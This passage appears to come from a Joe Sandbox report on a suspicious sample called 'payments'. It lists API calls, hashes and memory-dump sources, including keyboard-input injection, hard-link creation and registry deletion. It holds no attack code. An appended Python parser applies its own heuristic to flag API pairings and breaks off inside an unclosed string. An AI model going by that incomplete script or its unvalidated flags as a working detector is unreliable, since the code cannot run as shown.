• Instruction Fuzzy Hash: 9AE08C71804718ABDA0097948D05AFA737CA704300F110082B84BA2080DB34CB84AA3A
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C942EC,?,00C942AA,?), ref: 00C94304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C94316
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: 848dd88189ef71cacd23aed9f92455e3d3c24e9d67956387bcd267339b59e64f
• Instruction ID: e186a3370f993fd44f0066ab296e0b0b0495815b25495c5ce371212300170302
• Opcode Fuzzy Hash: 848dd88189ef71cacd23aed9f92455e3d3c24e9d67956387bcd267339b59e64f
• Instruction Fuzzy Hash: A0D0C770544712FFDB245F75E80CA5176E5BB18711B108429F555D2274DBB0D9C58A70
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00CF21FB,?,00CF23EF), ref: 00CF2213
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CF2225
Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetProcessId$kernel32.dll
                                                                                                                          • API String ID: 2574300362-399901964
                                                                                                                          • Opcode ID: b7d75699a789854b2388feb23fdd55550bb7387a482681a06155838440d000ce
                                                                                                                          • Instruction ID: 29758bb5a87bab2f06775fab0bafb1cfe278821f2ba7ff73e3299dfd10352417
                                                                                                                          • Opcode Fuzzy Hash: b7d75699a789854b2388feb23fdd55550bb7387a482681a06155838440d000ce
                                                                                                                          • Instruction Fuzzy Hash: 05D0A734900716BFD7214F30F80865176E5EB04310B10842DF851E2290DB70D8C48670
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00C941BB,00C94341,?,00C9422F,?,00C941BB,?,?,?,?,00C939FE,?,00000001), ref: 00C94359
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C9436B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                          • API String ID: 2574300362-3689287502
                                                                                                                          • Opcode ID: 7c1d5e56cc76cd7cf54918158f6f98dbc39df6600aa337ef96e9f52d68d46ce3
                                                                                                                          • Instruction ID: c729cbbab3402d02c8dacd1c581228a0f13088d902810590dee650efa0ceafb1
                                                                                                                          • Opcode Fuzzy Hash: 7c1d5e56cc76cd7cf54918158f6f98dbc39df6600aa337ef96e9f52d68d46ce3
                                                                                                                          • Instruction Fuzzy Hash: F3D0A730504712BFCB344F34E80CA4576E4BB20B15B108429F491D2260DBB0D8C58A30
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00CD052F,?,00CD06D7), ref: 00CD0572
                                                                                                                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CD0584
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                          • API String ID: 2574300362-1587604923
                                                                                                                          • Opcode ID: f4a81b2b088486c33f1ea604a7c22e4b5e03131891ce2294cc03f0ef8471c128
                                                                                                                          • Instruction ID: 9a730d9223bd06aaf014d78471552a62c7a255b1a04223d60356a9ac24fe23f6
                                                                                                                          • Opcode Fuzzy Hash: f4a81b2b088486c33f1ea604a7c22e4b5e03131891ce2294cc03f0ef8471c128
                                                                                                                          • Instruction Fuzzy Hash: 33D09E70904722AFD7205F65A808B52BBE5AF04711FA0851AED55D2350EB70D5C98A70
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00CD051D,?,00CD05FE), ref: 00CD0547
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CD0559
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                          • API String ID: 2574300362-1071820185
                                                                                                                          • Opcode ID: a88d34e0b3e11905dfa904067a1b80b7cec24046f580e76d3575039a840115bb
                                                                                                                          • Instruction ID: 947432225f02d91da8ed28e4905441d013062407f2cca808d23839931c57ca81
                                                                                                                          • Opcode Fuzzy Hash: a88d34e0b3e11905dfa904067a1b80b7cec24046f580e76d3575039a840115bb
                                                                                                                          • Instruction Fuzzy Hash: 84D09E70544722AFD7209F65A80865176A5AF14711FE0C41AE956D2350EB70C9898A60
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CEECBE,?,00CEEBBB), ref: 00CEECD6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CEECE8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                          • API String ID: 2574300362-1816364905
                                                                                                                          • Opcode ID: adfb1a23985aca2428eec34cf816137add3c372349240f5872a03354f2209d54
                                                                                                                          • Instruction ID: c8a29ac5cf1348861c0c8bd56693c8c2fd268c2c9b3d5ec6ec5ccc90b87872a5
                                                                                                                          • Opcode Fuzzy Hash: adfb1a23985aca2428eec34cf816137add3c372349240f5872a03354f2209d54
                                                                                                                          • Instruction Fuzzy Hash: 3FD0C770500723BFDB245F75E84975276E5AB04751B20C429F859D2251DFB0D8C5D670
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00CEBAD3,00000001,00CEB6EE,?,00D2DC00), ref: 00CEBAEB
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CEBAFD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                          • API String ID: 2574300362-199464113
                                                                                                                          • Opcode ID: 29514d4bb9f85626bd677afe0d13c2e22f5a6438f229e7bc5fae8703efb40b79
                                                                                                                          • Instruction ID: 2792795784fa591146cc93b440ef6058867728dd21a1f5feb41c5b31ad9aca50
                                                                                                                          • Opcode Fuzzy Hash: 29514d4bb9f85626bd677afe0d13c2e22f5a6438f229e7bc5fae8703efb40b79
                                                                                                                          • Instruction Fuzzy Hash: 12D0C770900752FFD7345FA5E848B6276E9AB04751B108429F857D2254DF70DCC5C674
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00CF3BD1,?,00CF3E06), ref: 00CF3BE9
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CF3BFB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                                          • Opcode ID: f2d1f5a4fd8deebdca43c79cfcb323dd086f52f7b93c002f5c37c6f6d6382b3d
                                                                                                                          • Instruction ID: c46871edf9a1fe068bd03141bafb6da25fc35da20cc3b2dbd9b8bfe597594d22
                                                                                                                          • Opcode Fuzzy Hash: f2d1f5a4fd8deebdca43c79cfcb323dd086f52f7b93c002f5c37c6f6d6382b3d
                                                                                                                          • Instruction Fuzzy Hash: C7D0A7F0500756BFC7205F60E808793BAF4AB01314B118419E455E2250DBB4C5C48E30
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b73a055a114c0b017c689be0102cf53da313280b41dd53e1c9dd55b0a737a1f0
                                                                                                                          • Instruction ID: 480c49ea2297a56bd10be07346d9faffcf4cf1ce26336dbdf0471c5c08ff67aa
                                                                                                                          • Opcode Fuzzy Hash: b73a055a114c0b017c689be0102cf53da313280b41dd53e1c9dd55b0a737a1f0
                                                                                                                          • Instruction Fuzzy Hash: A7C11A75A0021AEBDB14DF94C898FAEB7B5FF48710F10459CE916AB251D730DE81DBA0
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CEAAB4
                                                                                                                          • CoUninitialize.OLE32 ref: 00CEAABF
                                                                                                                            • Part of subcall function 00CD0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD027B
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CEAACA
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CEAD9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 780911581-0
                                                                                                                          • Opcode ID: 05758087a0b171ae6f129cefc91156f523096844a5eae63e5b812c7fa4911c6f
                                                                                                                          • Instruction ID: 56609520b58a1efb4f96ba51db14d55d2c993bf4ab201eb0407852a4a1d128a7
                                                                                                                          • Opcode Fuzzy Hash: 05758087a0b171ae6f129cefc91156f523096844a5eae63e5b812c7fa4911c6f
                                                                                                                          • Instruction Fuzzy Hash: C2A147352047419FCB10EF29C885B5AB7E5BF88724F148449FA969B3A2CB31FD41DB86
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2808897238-0
                                                                                                                          • Opcode ID: b435c089d009a3e1493fe4a8b9160004f5cb444e8a9abf8c9d4a3173cbbf46db
                                                                                                                          • Instruction ID: d74da10dbe4d5f19ae4059e98ab7a517a26a281efe74f6973081fac0489591ea
                                                                                                                          • Opcode Fuzzy Hash: b435c089d009a3e1493fe4a8b9160004f5cb444e8a9abf8c9d4a3173cbbf46db
                                                                                                                          • Instruction Fuzzy Hash: F551A130600742ABDB249FA6D499F6EB3E5EF45314F28881FE557C72E1DB3098819715
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3877424927-0
                                                                                                                          • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                          • Instruction ID: f7138cd7eb695d08232d74b1f48710d9a0e3fc1b6ebdbf81efe5af10d9419efe
                                                                                                                          • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                          • Instruction Fuzzy Hash: 9F51A1B0A00285ABDB248FA989856EE7BA5BF40320F248729F835962D0DB75DF519B41
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD3966
                                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD3982
                                                                                                                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CD39EF
                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CD3A4D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 432972143-0
                                                                                                                          • Opcode ID: 4697c01417940cc37c073c14ccc588915cfcf862434713f9300cc5a5efddd3bd
                                                                                                                          • Instruction ID: 58fe77c6b6b3bc3e24f1d9ab805bafb05edbce500f22f64d2855c532f95a8831
                                                                                                                          • Opcode Fuzzy Hash: 4697c01417940cc37c073c14ccc588915cfcf862434713f9300cc5a5efddd3bd
                                                                                                                          • Instruction Fuzzy Hash: 40414830A00288AEEF218B65CC15BFDBBB69B55311F04015BF6D1923C1CBB48F85E762
                                                                                                                          APIs
                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CDE742
                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00CDE768
                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CDE78D
                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CDE7B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3321077145-0
                                                                                                                          • Opcode ID: 61a08578215a0bf8df45f3272a1cb742e5c5036cea214c3b13114b57e9d0c1fd
                                                                                                                          • Instruction ID: 956cf372ab5bf0e6ade9997a360093d1eff0e2743c819b8ea1db8ac5a3cf5e16
                                                                                                                          • Opcode Fuzzy Hash: 61a08578215a0bf8df45f3272a1cb742e5c5036cea214c3b13114b57e9d0c1fd
                                                                                                                          • Instruction Fuzzy Hash: C0412739600610DFCF11AF29C44595DBBE5FF59720B098099E916AF3A2CB35FD019B91
                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFD807
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CFD87D
                                                                                                                          • PtInRect.USER32(?,?,00CFED5A), ref: 00CFD88D
                                                                                                                          • MessageBeep.USER32(00000000), ref: 00CFD8FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1352109105-0
                                                                                                                          • Opcode ID: 2642f00b93b2fec2778ebb8d75bc16b1c543c68d8553d29041594388ce35b89a
                                                                                                                          • Instruction ID: f0b2721291b372c998b6d16fe8653434e4b9cfad2eaee88576ccb7abe9b260c9
                                                                                                                          • Opcode Fuzzy Hash: 2642f00b93b2fec2778ebb8d75bc16b1c543c68d8553d29041594388ce35b89a
                                                                                                                          • Instruction Fuzzy Hash: DF41BF74A0021CEFCB51DF59D884BB97BF6FB45391F1881A5EA16CB290C730EA41CB92
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00CD3AB8
                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CD3AD4
                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00CD3B34
                                                                                                                          • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00CD3B92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 432972143-0
                                                                                                                          • Opcode ID: f39febd0dbadb2ba4a32e15d77bae7a02092191a7928b50ee856bd7ec2fc07b5
                                                                                                                          • Instruction ID: e50bdf6a0305e59a2bb3d08e9feb20ba50aa7f7772a086ebe37881d28fee1ab7
                                                                                                                          • Opcode Fuzzy Hash: f39febd0dbadb2ba4a32e15d77bae7a02092191a7928b50ee856bd7ec2fc07b5
                                                                                                                          • Instruction Fuzzy Hash: 62310330A00298BFEF218B648C19BFEBBAA9B56310F04015BE691973D1C7748F46D766
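As an added example, not part of the Joe Sandbox report or its tooling: a small Python parser for the per-function "APIs" record lines in this listing ("• API.MODULE(args), ref: ADDR", with "Part of subcall function ADDR:" marking calls reached through a callee), followed by a triage pass that flags functions whose API set covers a pattern of interest, such as the SetKeyboardState plus SendInput pairing seen in the two keyboard blocks above. The sample text is constructed from records on this page so the code runs offline; the two API sets in PATTERNS are this example's own heuristic, not a Joe Sandbox signature or its "API ID" scheme.

```python
"""Parse the "APIs" records of a Joe Sandbox IDA-plugin function listing.

Added example (not Joe Sandbox code). SAMPLE is constructed from records
on this page; PATTERNS is this example's own triage heuristic.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# One record line. The "(args)" group is optional: the report prints
# "CoUninitialize.OLE32 ref: ..." when no arguments were recovered.
RECORD_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: three function blocks copied from the listing above.
SAMPLE = """\
APIs
• CoInitialize.OLE32(00000000), ref: 00CEAAB4
• CoUninitialize.OLE32 ref: 00CEAABF
  • Part of subcall function 00CD0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD027B
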